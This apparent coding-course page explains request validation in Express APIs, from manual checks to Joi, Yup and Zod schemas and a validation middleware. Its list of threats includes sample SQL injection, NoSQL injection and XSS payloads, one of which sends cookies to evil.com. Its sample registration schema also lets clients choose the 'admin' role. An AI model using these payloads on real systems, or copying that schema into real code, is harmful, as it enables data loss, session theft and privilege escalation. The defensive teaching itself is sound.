Avancé25 min de lecture

Data Validation

Validate incoming request data with schema validation to protect your API from bad input.

Why Validate?

There is a golden rule in backend development: never trust client input. Every piece of data that arrives from a client — whether it comes from a web form, a mobile app, a CLI tool, or another API — must be treated as potentially malicious, malformed, or simply wrong.

Users make mistakes. They leave required fields empty, enter their phone number in the email field, submit a negative age, paste a novel into a field with a 100-character limit, or double-click the submit button and send the same data twice.

Attackers send malicious data. Without validation, your API is vulnerable to:

  • SQL Injection — An attacker sends '; DROP TABLE users; -- as a username. If you insert this directly into a SQL query, your database is destroyed.
  • NoSQL Injection — An attacker sends {"$gt": ""} as a password in a MongoDB query. Without validation, this matches any password and grants access to any account.
  • Cross-Site Scripting (XSS) — An attacker submits <script>document.location='http://evil.com/steal?cookie='+document.cookie</script> as their name. If you render this in HTML without escaping, it executes in every user's browser.
  • Buffer Overflow / Denial of Service — An attacker sends a 10 GB string as a name field, consuming your server's memory and crashing it.

Validate at the API boundary. The right place to validate is at the entry point of your API — in a middleware function that runs before your controller. This is called defense in depth: you validate data as early as possible, so invalid data never reaches your business logic or database layer.

Do not rely solely on frontend validation. Frontend validation improves user experience (instant feedback), but it provides zero security. An attacker can bypass any frontend validation by sending requests directly to your API using curl, Postman, or a script. Your backend must validate everything independently, as if the frontend does not exist.

Manual Validation (The Hard Way)

Before we look at the right way to validate, let us see what manual validation looks like — and why it quickly becomes unmanageable.

Consider a user registration endpoint that requires a name, email, password, and optional age:

javascript
app.post('/users', (req, res) => {
  const { name, email, password, age } = req.body;
  const errors = [];

  // Name validation
  if (!name) {
    errors.push('Name is required');
  } else if (typeof name !== 'string') {
    errors.push('Name must be a string');
  } else if (name.trim().length < 2) {
    errors.push('Name must be at least 2 characters');
  } else if (name.trim().length > 50) {
    errors.push('Name must be at most 50 characters');
  }

  // Email validation
  if (!email) {
    errors.push('Email is required');
  } else if (typeof email !== 'string') {
    errors.push('Email must be a string');
  } else if (!/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email)) {
    errors.push('Email must be a valid email address');
  }

  // Password validation
  if (!password) {
    errors.push('Password is required');
  } else if (password.length < 8) {
    errors.push('Password must be at least 8 characters');
  }

  // Age validation (optional)
  if (age !== undefined) {
    if (typeof age !== 'number' || !Number.isInteger(age)) {
      errors.push('Age must be an integer');
    } else if (age < 0 || age > 150) {
      errors.push('Age must be between 0 and 150');
    }
  }

  if (errors.length > 0) {
    return res.status(400).json({ errors });
  }

  // ... proceed with creating the user
});

That is 30 lines of validation code for just 4 fields. Now imagine you have 20 endpoints, each with 5-10 fields. That is hundreds of lines of repetitive, error-prone, hard-to-maintain validation code scattered across your codebase. If you need to change how emails are validated, you have to update it in every file. If you forget one check, you have a security hole.

There is a much better way.

Schema Validation Libraries

Schema validation libraries let you declare what valid data looks like, then validate any data against that declaration. Instead of writing imperative if/else chains, you define a schema once and reuse it everywhere.

The three most popular libraries in the Node.js ecosystem are:

Joi — The original and most feature-rich. Created by the team behind the Hapi framework. Very expressive, supports complex nested validation, custom error messages, and conditional validation. Slightly larger bundle size.

javascript
const Joi = require('joi');
const schema = Joi.object({
  name: Joi.string().min(2).max(50).required(),
  email: Joi.string().email().required(),
  age: Joi.number().integer().min(0).max(150),
});

Yup — Inspired by Joi but designed for frontend use (React forms with Formik). Lighter weight, supports async validation, good TypeScript support. Common in full-stack JavaScript applications.

javascript
const yup = require('yup');
const schema = yup.object({
  name: yup.string().min(2).max(50).required(),
  email: yup.string().email().required(),
  age: yup.number().integer().positive(),
});

Zod — The newest and most TypeScript-focused. Infers TypeScript types from schemas automatically, so your validation and type definitions are always in sync. Rapidly becoming the standard for TypeScript projects.

javascript
const z = require('zod');
const schema = z.object({
  name: z.string().min(2).max(50),
  email: z.string().email(),
  age: z.number().int().positive().optional(),
});

All three follow the same core principles: you define a schema declaratively, validate data against it, and get back either the validated data or a detailed list of errors. The schema serves as both validation logic AND documentation of your API's expected input format.

Schemas are composable — you can combine smaller schemas into larger ones, reuse common patterns (email, password, pagination), and extend schemas for different endpoints (createUser vs updateUser).

Validation Middleware Pattern

The cleanest way to integrate validation into Express is the validation middleware pattern. Instead of validating inside each controller, you create a reusable middleware factory that validates req.body against a schema before the request reaches the controller.

javascript
// middleware/validate.js
const validate = (schema) => {
  return (req, res, next) => {
    const result = schema.safeParse(req.body); // Zod syntax
    if (!result.success) {
      return res.status(400).json({
        status: 'error',
        message: 'Validation failed',
        errors: result.error.issues.map(issue => ({
          field: issue.path.join('.'),
          message: issue.message,
        })),
      });
    }
    req.body = result.data; // Replace body with validated & transformed data
    next();
  };
};

Usage in routes:

javascript
const { createUserSchema, updateUserSchema } = require('../schemas/user');

router.post('/users', validate(createUserSchema), userController.create);
router.put('/users/:id', validate(updateUserSchema), userController.update);

This pattern has several powerful benefits:

  1. Controllers stay clean. By the time the request reaches your controller, the data is guaranteed to be valid. No validation code in controllers, ever.
  2. Consistent error format. Every validation error across your entire API returns the same JSON structure. Clients can parse errors predictably.
  3. Reusable schemas. Define a passwordSchema once and use it in both login and registration endpoints. Define an emailSchema and use it everywhere.
  4. Automatic type coercion. Many libraries can coerce types: if the client sends "25" for an age field, the schema can parse it to the number 25.
  5. Self-documenting. The schema IS the documentation. Anyone reading createUserSchema knows exactly what fields the endpoint accepts, their types, and their constraints.

You can also validate req.params and req.query with the same pattern by passing options: validate(schema, 'params') or validate(schema, 'query').

Validation Middleware with Zod Schemas

javascript
const { z } = require('zod');

// ── Reusable Schema Pieces ──────────────────────────
const emailSchema = z.string().email('Invalid email format').toLowerCase();
const passwordSchema = z.string()
  .min(8, 'Password must be at least 8 characters')
  .regex(/[A-Z]/, 'Password must contain at least one uppercase letter')
  .regex(/[0-9]/, 'Password must contain at least one number');

// ── User Schemas ────────────────────────────────────
const createUserSchema = z.object({
  name: z.string().min(2, 'Name must be at least 2 characters').max(50),
  email: emailSchema,
  password: passwordSchema,
  age: z.number().int().min(0).max(150).optional(),
  role: z.enum(['user', 'admin']).default('user'),
  address: z.object({
    street: z.string().min(1),
    city: z.string().min(1),
    zipCode: z.string().regex(/^\d{5}$/, 'ZIP must be 5 digits'),
  }).optional(),
  tags: z.array(z.string()).max(10).default([]),
});

const updateUserSchema = createUserSchema.partial();
// .partial() makes all fields optional — perfect for PATCH updates

// ── Validation Middleware Factory ────────────────────
const validate = (schema, source = 'body') => {
  return (req, res, next) => {
    const result = schema.safeParse(req[source]);

    if (!result.success) {
      return res.status(400).json({
        status: 'error',
        message: 'Validation failed',
        errors: result.error.issues.map(issue => ({
          field: issue.path.join('.'),
          message: issue.message,
          code: issue.code,
        })),
      });
    }

    // Replace raw data with validated + transformed data
    req[source] = result.data;
    next();
  };
};

// ── Usage in Routes ─────────────────────────────────
// POST /users — validate body against createUserSchema
router.post('/users',
  validate(createUserSchema),
  userController.create
);

// PATCH /users/:id — validate body against partial schema
router.patch('/users/:id',
  validate(updateUserSchema),
  userController.update
);

// GET /users?page=1&limit=10 — validate query params
const paginationSchema = z.object({
  page: z.coerce.number().int().min(1).default(1),
  limit: z.coerce.number().int().min(1).max(100).default(10),
});
router.get('/users',
  validate(paginationSchema, 'query'),
  userController.getAll
);

At what point should you validate incoming request data?

Prêt à pratiquer ?

Crée ton compte gratuit pour accéder à l'éditeur de code interactif, lancer les défis et suivre ta progression.